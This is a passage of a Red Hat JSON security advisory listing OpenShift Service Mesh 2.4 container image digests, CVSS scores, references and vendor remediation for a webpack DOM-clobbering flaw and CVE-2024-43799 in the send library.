"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
